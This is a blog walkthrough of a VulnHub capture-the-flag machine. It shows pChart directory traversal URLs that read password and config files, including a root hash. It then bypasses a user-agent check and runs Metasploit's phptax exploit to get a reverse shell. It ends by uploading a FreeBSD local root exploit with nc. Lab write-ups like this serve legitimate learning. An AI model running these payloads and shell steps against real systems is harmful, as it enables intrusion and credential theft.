mod_ssl/2.2.21 related exploits also do not seem to work because there is no HTTPS on the server and the found exploits (Apache mod_ssl < 2.8.7 OpenSSL – ‘OpenFuck.c’ Remote Exploit) will not work because they need SSL.

dirb also finds nothing.

I browse to http://192.168.31.146:80 and I view source. Bingo!

<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

searchsploit to the rescue:

 

 

# Exploit Author: Balazs Makany
# Vendor Homepage: www.pchart.net
# Software Link: www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A

[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

We try different directory traversal customized URL, but they don’t work because I treat the host like a Linux system…and it is a FreeBSD one, so file locations are different.

/etc/passwd does not exist. Instead we have:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/master.passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $ # root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh toor:*:0:0::0:0:Bourne-again Superuser:/root:

I fail to see that the root user actually has the password encrypted and I move along, searching for the equivalent of /etc/shadow, which is /etc/spwd.db, which does not load into the browser when I access:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/spwd.db%22

Google searching finds me:

http://192.168.31.146/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

Which means that if switch the HTTP user agent to Mozilla4, I might get a different webpage.

root@kali:~# curl -H “User-Agent:Mozilla/4.0” http://192.168.31.146:8080/phptax/ | head -n1

<title>PHPTAX by William L. Berggren 2003(c)</title> 100 4125 0 4125 0 0 2014k 0 –:–:– –:–:– –:–:– 2014k curl: (23) Failed writing body (4067 != 4230) root@kali:~#

root@kali:~# searchsploit phptax
---------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
---------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection (Met | php/webapps/21833.rb
use exploit/multi/http/phptax_exec
set RHOST 192.168.31.146
set RPORT 8080

msf exploit(multi/http/phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.31.139:4444
[*] 192.168.31.1468080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo bPVG3SBi0VbyjPza;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo RHWVYqnt2WyVvZsH;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “bPVG3SBi0VbyjPza\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “RHWVYqnt2WyVvZsH\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 5 opened (192.168.31.139:4444 -> 192.168.31.146:47858) at 2018-02-26 17:22:01 -0500
[*] Command shell session 6 opened (192.168.31.139:4444 -> 192.168.31.146:56244) at 2018-02-26 17:22:01 -0500

id
uid=80(www) gid=80(www) groups=80(www)

We have limited shell.

uname -a reminds us that we are running FreeBSD 9.

We copy the exploit:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c ./

Upload it to the victim machine with nc:

nc -lvvp 8888 < ./28718.c   // sending from the attacking machine

nc -nv 8888 > ./28718.c  // receiving on the victim machine

chmod 777 ./28718.c

We compile and run the exploit:

Congratz to myself. I still feel like a noob.

 

Posted in hacking, vulnhub. Tagged with , , , .
1234next →